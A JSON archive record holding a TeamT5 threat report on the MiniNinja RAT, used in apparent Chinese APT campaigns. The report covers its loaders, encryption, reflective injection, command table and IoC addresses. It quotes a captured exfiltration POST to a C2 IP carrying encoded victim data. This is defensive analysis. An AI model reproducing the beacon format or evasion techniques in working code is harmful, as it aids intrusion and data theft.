{
	"id": "2ff17fcf-7ffc-4e07-a856-20187c7f13c3",
	"created_at": "2026-04-06T00:06:14.726493Z",
	"updated_at": "2026-04-10T03:33:16.368628Z",
	"deleted_at": null,
	"sha1_hash": "3e98e6d2c76184ef28a5cb1b738c4386028a5702",
	"title": "Assassinations of \"MiniNinja\" in Various APAC Countries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 435327,
	"plain_text": "Assassinations of \"MiniNinja\" in Various APAC Countries\r\nBy Cyber Threat Intelligence\r\nPublished: 2021-10-22 · Archived: 2026-04-05 16:17:55 UTC\r\nTeamT5 discovered a new remote administration tool (RAT), which we dubbed as MiniNinja, being used in\r\nseveral Chinese APT campaigns. TeamT5 has observed countries across different APAC regions, including\r\nTaiwan, Russia, Kyrgyzstan, Uzbekistan, Vietnam, the Philippines, and Pakistan, being targeted and attacked by\r\nthis malware. The impacted industries include governments, energy, IT, telecommunication and engineering.\r\nMiniNinja is a complex malware that uses several advanced techniques to prevent itself from being detected and\r\nanalyzed. Further, its wide targeting scope also attracted our attention. In this report, we will introduce the\r\ntechnical detail of our analysis.\r\nMiniNinja was first discovered in the wild in a targeted attack against Taiwanese government agencies in early\r\nMarch 2021. The actor leveraged the ProxyLogon vulnerability (CVE-2021-26855) to compromise an email\r\nserver and further implanted CobaltStrike Beacon and MiniNinja RAT in the victim network environment. This\r\ninformation was also disclosed in an ESET report[1] about a \"Websiic Campaign\" using the ProxyLogon\r\nvulnerability. TeamT5 noticed the existence of this new malware and started tracking its activities. Since then,\r\nTeamT5 has observed its footprints in Vietnam[2], Pakistan and the Philippines, possibly also implanted in victim\r\nhosts via the ProxyLogon vulnerability. Its latest activities were spear phishing email attacks against Russia and\r\nUzbekistan in September 2021. TeamT5 is still uncertain of the attribution of these attacks. However, we possess\r\nhigh confidence that this is a new tool used by Chinese APT based on its TTPs and C2 infrastructure.\r\nTo bypass antivirus detection, MiniNinja is encrypted as a binary blob in a binary payload file. It might have one\r\nto multiple loader components in native PE or .Net, but basically the loaders do similar tasks. The loader\r\ncomponents will decrypt and run it in memory via reflective DLL injection techniques. Its loader firstly checks the\r\nfirst 4 bytes of the payload file and decrypts the content by using 3DES (112bit) algorithm in case of header check\r\npasses:\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 1 of 7\n\nThe decrypted buffer might be passed to a second stage loader for further processing if there are multiple loader\r\ncomponents. The loader will then decode the content by custom decoding methods and LZSS decompression\r\nalgorithm. The decoded payload is a PE file with its PE header erased and it is just the MiniNinja RAT. Finally,\r\nthe loader will locate its export function \"Debug\" and start execution from there:\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 2 of 7\n\nIn a payload collected from some Taiwanese victims, there is a PDB string left by the developer (only in memory)\r\nand thus we name this malware MiniNinja:\r\nThe decrypted malware configuration block contains Mutex string, C2 URL, HTTP Header information, sleep\r\ntime, etc.:\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 3 of 7\n\nUpon execution, the following victim host information will be collected:\r\nSystem info\r\nOS version\r\nHostname\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 4 of 7\n\nIP addr\r\nProcess name\r\nProcess ID\r\nThe above data would be encoded with XOR encode and custom base64 encode. Finally, the encoded result would\r\nbe sent to its C2 via POST:\r\nPOST http://149.28.28.159:443/Collector/3.0/ HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: 149.28.28.159:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko\r\nContent-Length: 474\r\nPragma: no-cache\r\nngluKGJ2JZ2[NKOs506NzsX9yVU7gkxWozQK5WmWoaUr9C0DN0iXb6lwFkcb2CE3HBk[4ISP3nI88jpLROJhQp8PvwLHU6LGYT4J4d4WOETXaWu8\r\nMiniNinja is a full-featured RAT that supports commands for file, process, memory, shell or account operations.\r\nIts supported functions are listed below in the Command Table.\r\nCommand Table\r\nSupported command:\r\nCommand Description\r\n0x4E20 Heart beat\r\n0x4E21 Init dwProcessId\r\n0x4E22 Change sleep time\r\n0x4E23 Exit(ExitProcess)\r\n0x4E24 CreateProcess\r\n0x4E25 TerminateThread\r\n0x4E26 set close_socket to 0\r\n0x4E2A ShellCommand\r\n0x4E2B Get Command Result(call WriteFile,PeekNamedPipe,ReadFile)\r\n0x4E2C TerminateProcess\r\n0x4E2D IterateProcess then TerminateProcess\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 5 of 7\n\nCommand Description\r\n0x4E34 ~ 0x4E47 File Operations\r\n0x4E34 List Disk Driver\r\n0x4E35 ListDirectory\r\n0x4E36 CreateDirectory\r\n0x4E37 DeleteFile\r\n0x4E38 RemoveDirectory\r\n0x4E39 MoveFile\r\n0x4E3A CreateFile\r\n0x4E3E ReadFile\r\n0x4E3F WriteFile\r\n0x4E48 - 0x4E51 Socket Operations\r\n0x4E48 Connet Host\r\n0x4E49 Check socket status\r\n0x4E4A Send Data to Host\r\n0x4E4B Recv Data from Host\r\n0x4E4C Close socket\r\n0x4E4D Connect Host\r\nPreserved?(0x4E4E-0x4E51) Null\r\n0x4E5C ~ 0x4E65 Memory Operations\r\n0x4E5C string copy\r\n0x4E5D string copy\r\n0x4E5E string copy\r\n*0x4E5F,0x4E60 Execute Plugin? (CreateProcess, process Injection and createthread)\r\n*0x4E61,0x4E62 FileMapping(Write data)\r\nPreserved?(0x4E63,0x4E64) Null\r\n*0x4E65 Close File Handler\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 6 of 7\n\nCommand Description\r\n0x5208 List c2 configuration\r\n0x4E52 List Process\r\n0x4E53 IterateProcess,kill process\r\n0x4E54 Process Injection\r\n0x4E55 CreateThread for running DLL export function\r\n0x4E56 Read FileMap data(OpenFileMappingA -\u003e robject_,custom_base64)\r\n0x4E57 Exit Dll function?(robject_, UnmapViewOfFile)\r\n0x4E58 LookupAccountSid\r\nIoC\r\n149.28.28.159\r\n167.99.168.251\r\n185.220.101.204\r\n162.247.72.199\r\n194.156.98.191\r\n202.182.100.134\r\n109.70.100.55\r\n185.220.101.18\r\n193.36.119.144 (TW compromised host)\r\nReferences\r\nSource: https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nhttps://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/"
	],
	"report_names": [
		"assassinations-of-minininja-in-various-apac-countries"
	],
	"threat_actors": [
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433974,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.pdf",
		"text": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.txt",
		"img": "https://archive.orkl.eu/3e98e6d2c76184ef28a5cb1b738c4386028a5702.jpg"
	}
}